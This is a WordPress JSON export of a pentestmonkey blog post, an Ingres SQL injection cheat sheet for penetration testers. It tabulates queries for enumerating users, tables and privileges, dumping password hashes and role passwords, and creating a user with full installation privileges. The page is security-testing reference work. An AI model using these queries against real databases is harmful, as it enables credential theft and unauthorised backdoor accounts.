{"id":83,"date":"2007-07-07T10:40:23","date_gmt":"2007-07-07T10:40:23","guid":{"rendered":"http:\/\/pentestmonkey.net\/?p=83"},"modified":"2011-11-11T18:59:31","modified_gmt":"2011-11-11T18:59:31","slug":"ingres-sql-injection-cheat-sheet","status":"publish","type":"post","link":"https:\/\/pentestmonkey.net\/cheat-sheet\/sql-injection\/ingres-sql-injection-cheat-sheet","title":{"rendered":"Ingres SQL Injection Cheat Sheet"},"content":{"rendered":"<p>Ingres seems to be one of the less common database backends for web applications, so I thought it would be worth installing it and making some notes to make my next Ingres-based web app test a little easier.<\/p>\n<p><!--more--><\/p>\n<p>Below are some tabulated notes on how to do many of thing you&#8217;d normally do via SQL injection.\u00a0 All tests were performed on Ingres 9.2.0 alpha Build 108 for Linux.\u00a0 The Ingres download page is <a href=\"http:\/\/ingres.com\/downloads\/prod-comm-download.php\">here<\/a>.<\/p>\n<p>This page will probably remain a work-in-progress for some time yet.\u00a0 I&#8217;ll update it as I learn more.<\/p>\n<p>This post is part of series of SQL Injection Cheat Sheets.\u00a0 In this series, I&#8217;ve endevoured to tabulate the data to make it easier to read and to use the same table for for each database backend.\u00a0 This helps to highlight any features which are lacking for each database, and enumeration techniques that don&#8217;t apply and also areas that I haven&#8217;t got round to researching yet.<\/p>\n<p>The complete list of SQL Injection Cheat Sheets I&#8217;m working is:<\/p>\n<ul>\n<li><a href=\"http:\/\/pentestmonkey.net\/blog\/oracle-sql-injection-cheat-sheet\/\">Oracle<\/a><\/li>\n<li><a href=\"http:\/\/pentestmonkey.net\/blog\/mssql-sql-injection-cheat-sheet\/\">MSSQL<\/a><\/li>\n<li><a href=\"http:\/\/pentestmonkey.net\/blog\/mysql-sql-injection-cheat-sheet\/\">MySQL<\/a><\/li>\n<li><a href=\"http:\/\/pentestmonkey.net\/blog\/postgres-sql-injection-cheat-sheet\/\">PostgreSQL<\/a><\/li>\n<li><a href=\"http:\/\/pentestmonkey.net\/blog\/ingres-sql-injection-cheat-sheet\/\">Ingres<\/a><\/li>\n<li><a href=\"http:\/\/pentestmonkey.net\/blog\/db2-sql-injection-cheat-sheet\/\">DB2<\/a><\/li>\n<li><a href=\"http:\/\/pentestmonkey.net\/blog\/informix-sql-injection-cheat-sheet\/\">Informix<\/a><\/li>\n<\/ul>\n<p>I&#8217;m not planning to write one for MS Access, but there&#8217;s a great <a href=\"http:\/\/nibblesec.org\/files\/MSAccessSQLi\/MSAccessSQLi.html\">MS Access Cheat Sheet here<\/a>.<\/p>\n<table border=\"1\">\n<tbody>\n<tr>\n<td>Version<\/td>\n<td>select dbmsinfo(&#8216;_version&#8217;);<\/td>\n<\/tr>\n<tr>\n<td>Comments<\/td>\n<td>SELECT 123; &#8212; comment<br \/>\nselect 123; \/* comment *\/<\/td>\n<\/tr>\n<tr>\n<td>Current User<\/td>\n<td>select dbmsinfo(&#8216;session_user&#8217;);<br \/>\nselect dbmsinfo(&#8216;system_user&#8217;);<\/td>\n<\/tr>\n<tr>\n<td>List Users<\/td>\n<td>First connect to iidbdb, then:<br \/>\nSELECT name, password FROM\u00a0iiuser; &#8212; or<br \/>\nSELECT own FROM iidatabase;<\/td>\n<\/tr>\n<tr>\n<td>Create Users<\/td>\n<td>create user testuser with password = &#8216;testuser&#8217;;&#8211; priv<\/td>\n<\/tr>\n<tr>\n<td>List Password Hashes<\/td>\n<td>First connect to iidbdb, then:<br \/>\nselect name, password from iiuser;<\/td>\n<\/tr>\n<tr>\n<td>List Privileges<\/td>\n<td>select dbmsinfo(&#8216;db_admin&#8217;);<br \/>\nselect dbmsinfo(&#8216;create_table&#8217;);<br \/>\nselect dbmsinfo(&#8216;create_procedure&#8217;);<br \/>\nselect dbmsinfo(&#8216;security_priv&#8217;);<br \/>\nselect dbmsinfo(&#8216;select_syscat&#8217;);<br \/>\nselect dbmsinfo(&#8216;db_privileges&#8217;);<br \/>\nselect dbmsinfo(&#8216;current_priv_mask&#8217;);<\/td>\n<\/tr>\n<tr>\n<td>List DBA Accounts<\/td>\n<td>TODO<\/td>\n<\/tr>\n<tr>\n<td>Current Database<\/td>\n<td>select dbmsinfo(&#8216;database&#8217;);<\/td>\n<\/tr>\n<tr>\n<td>List Databases<\/td>\n<td>SELECT name FROM iidatabase; &#8212; connect to iidbdb<\/td>\n<\/tr>\n<tr>\n<td>List Columns<\/td>\n<td>select column_name, column_datatype, table_name, table_owner from iicolumns;<\/td>\n<\/tr>\n<tr>\n<td>List Tables<\/td>\n<td>select table_name, table_owner from iitables;<br \/>\nselect relid, relowner, relloc from iirelation;<br \/>\nselect relid, relowner, relloc from iirelation where relowner != &#8216;$ingres&#8217;;<\/td>\n<\/tr>\n<tr>\n<td>Find Tables From Column Name<\/td>\n<td>SELECT table_name, table_owner FROM iicolumns WHERE column_name = &#8216;value&#8217;<\/td>\n<\/tr>\n<tr>\n<td>Select Nth Row<\/td>\n<td>Astoundingly, this <a href=\"http:\/\/community.ingres.com\/forums\/viewtopic.php?p=6050\">doesn&#8217;t<\/a>seem to be possible!\u00a0 This is as close as you can get:select top 10 blah from table;<br \/>\nselect first 10 blah form table;<\/td>\n<\/tr>\n<tr>\n<td>Select Nth Char<\/td>\n<td>select substr(&#8216;abc&#8217;, 2, 1); &#8212; returns &#8216;b&#8217;<\/td>\n<\/tr>\n<tr>\n<td>Bitwise AND<\/td>\n<td>The function &#8220;bit_and&#8221; exists, but seems hard to use.\u00a0 Here&#8217;s an<br \/>\nexample of ANDing 3 and 5 together.\u00a0 The result is a &#8220;byte&#8221; type<br \/>\nwith value ?01:select substr(bit_and(cast(3 as byte), cast(5 as byte)),1,1);<\/td>\n<\/tr>\n<tr>\n<td>ASCII Value -&gt; Char<\/td>\n<td>TODO<\/td>\n<\/tr>\n<tr>\n<td>Char -&gt; ASCII Value<\/td>\n<td>TODO<br \/>\n(The &#8220;ascii&#8221; function exists, but doesn&#8217;t seem to do what I&#8217;d expect.)<\/td>\n<\/tr>\n<tr>\n<td>Casting<\/td>\n<td>select cast(123 as varchar);<br \/>\nselect cast(&#8216;123&#8217; as integer);<\/td>\n<\/tr>\n<tr>\n<td>String Concatenation<\/td>\n<td>select &#8216;abc&#8217; || &#8216;def&#8217;;<\/td>\n<\/tr>\n<tr>\n<td>If Statement<\/td>\n<td>TODO<\/td>\n<\/tr>\n<tr>\n<td>Case Statement<\/td>\n<td>TODO<\/td>\n<\/tr>\n<tr>\n<td>Avoiding Quotes<\/td>\n<td>TODO<\/td>\n<\/tr>\n<tr>\n<td>Time Delay<\/td>\n<td>???See <a href=\"http:\/\/www.microsoft.com\/technet\/community\/columns\/secmvp\/sv0907.mspx\">Heavy Queries<\/a> article for some ideas.<\/td>\n<\/tr>\n<tr>\n<td>Make DNS Requests<\/td>\n<td>TODO<\/td>\n<\/tr>\n<tr>\n<td>Command Execution<\/td>\n<td>Impossible?<\/td>\n<\/tr>\n<tr>\n<td>Local File Access<\/td>\n<td>TODO<\/td>\n<\/tr>\n<tr>\n<td>Hostname, IP Address<\/td>\n<td>SELECT dbmsinfo(&#8216;ima_server&#8217;)<\/td>\n<\/tr>\n<tr>\n<td>Location of DB files<\/td>\n<td>SELECT dbdev, ckpdev, jnldev, sortdev FROM iidatabase WHERE name = &#8216;value&#8217; &#8212; primary location of db<br \/>\nSELECT lname FROM iiextend WHERE dname = &#8216;value&#8217; &#8212; extended location of db<br \/>\nSELECT are FROM iilocations where lname = &#8216;value&#8217; &#8212;\u00a0all area (ie directory) linked with a location<\/td>\n<\/tr>\n<tr>\n<td>Default\/System Databases<\/td>\n<td>SELECT name FROM iidatabase WHERE own = &#8216;$ingres&#8217; &#8212; connect to iidbdb<\/td>\n<\/tr>\n<tr>\n<td>Installing Locally<\/td>\n<td>The Ingres database can be downloaded for free from <a href=\"http:\/\/esd.ingres.com\/\">http:\/\/esd.ingres.com\/<\/a><br \/>\nA pre-built Linux-based Ingres Database Server can be download from <a href=\"http:\/\/www.vmware.com\/appliances\/directory\/832\">http:\/\/www.vmware.com\/appliances\/directory\/832<\/a><\/td>\n<\/tr>\n<tr>\n<td>Database Client<\/td>\n<td>TODO<br \/>\nThere is a client called &#8220;sql&#8221; which can be used for local connections (at least) in the\u00a0 database server package above.<\/td>\n<\/tr>\n<tr>\n<td>Logging in from command line<\/td>\n<td>$ su &#8211;\u00a0 ingres<br \/>\n$ sql iidbdb<br \/>\n* select dbmsinfo(&#8216;_version&#8217;); go<\/td>\n<\/tr>\n<tr>\n<td>Identifying on the network<\/td>\n<td>TODO<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>The following areas are interesting enough to include on this page, but I haven&#8217;t researched them for other databases:<\/p>\n<table border=\"1\">\n<tbody>\n<tr>\n<td><strong>Description<\/strong><\/td>\n<td><strong>SQL \/ Comments\u00a0<\/strong><\/td>\n<\/tr>\n<tr>\n<td>\u00a0Batching Queries Allowed?<\/td>\n<td>Not via DBI in PERL.\u00a0 Subsequent statements seem to get ignored:<br \/>\nselect blah from table where foo = 1; select &#8230; doesn&#8217;t matter this is ignored.<\/td>\n<\/tr>\n<tr>\n<td>\u00a0FROM clause mandated in SELECTs?<\/td>\n<td>No.\u00a0 You don&#8217;t need to select form &#8220;dual&#8221; or anything.\u00a0 The following is legal:<br \/>\nselect 1;<\/td>\n<\/tr>\n<tr>\n<td>\u00a0UNION supported<\/td>\n<td>Yes.\u00a0 Nothing tricky here.\u00a0 The following is legal:<br \/>\nselect 1 union select 2;<\/td>\n<\/tr>\n<tr>\n<td>\u00a0Enumerate Tables Privs<\/td>\n<td>select table_name, permit_user, permit_type from iiaccess;<\/td>\n<\/tr>\n<tr>\n<td>\u00a0Length of a string<\/td>\n<td>select length(&#8216;abc&#8217;); &#8212; returns 3<\/td>\n<\/tr>\n<tr>\n<td>\u00a0Roles and passwords<\/td>\n<td>First you need to connect to iidbdb, then:<br \/>\nselect roleid, rolepass from iirole;<\/td>\n<\/tr>\n<tr>\n<td>List Database Procedures<\/td>\n<td>First you need to connect to iidbdb, then:<br \/>\nselect dbp_name,\u00a0 dbp_owner from iiprocedure;<\/td>\n<\/tr>\n<tr>\n<td>Create Users + Granting Privs<\/td>\n<td>First you need to connect to iidbdb, then:<br \/>\ncreate user pm with password = &#8216;password&#8217;;<br \/>\ngrant all on current installation to pm;<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><span class=\"Apple-style-span\" style=\"color: #000000; font-size: 17px; line-height: 25px;\">Thanks<\/span><\/p>\n<p>Pentestmonkey\u00a0gratefully\u00a0acknowledges\u00a0the contributions of:<\/p>\n<p>Jean-Pierre Zuate<\/p>\n<p>&nbsp;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Ingres seems to be one of the less common database backends for web applications, so I thought it would be worth installing it and making some notes to make my next Ingres-based web app test a little easier.<\/p>\n","protected":false},"author":3,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[8],"tags":[46,44,110,19,78],"_links":{"self":[{"href":"https:\/\/pentestmonkey.net\/wp-json\/wp\/v2\/posts\/83"}],"collection":[{"href":"https:\/\/pentestmonkey.net\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/pentestmonkey.net\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/pentestmonkey.net\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/pentestmonkey.net\/wp-json\/wp\/v2\/comments?post=83"}],"version-history":[{"count":6,"href":"https:\/\/pentestmonkey.net\/wp-json\/wp\/v2\/posts\/83\/revisions"}],"predecessor-version":[{"id":420,"href":"https:\/\/pentestmonkey.net\/wp-json\/wp\/v2\/posts\/83\/revisions\/420"}],"wp:attachment":[{"href":"https:\/\/pentestmonkey.net\/wp-json\/wp\/v2\/media?parent=83"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/pentestmonkey.net\/wp-json\/wp\/v2\/categories?post=83"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/pentestmonkey.net\/wp-json\/wp\/v2\/tags?post=83"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}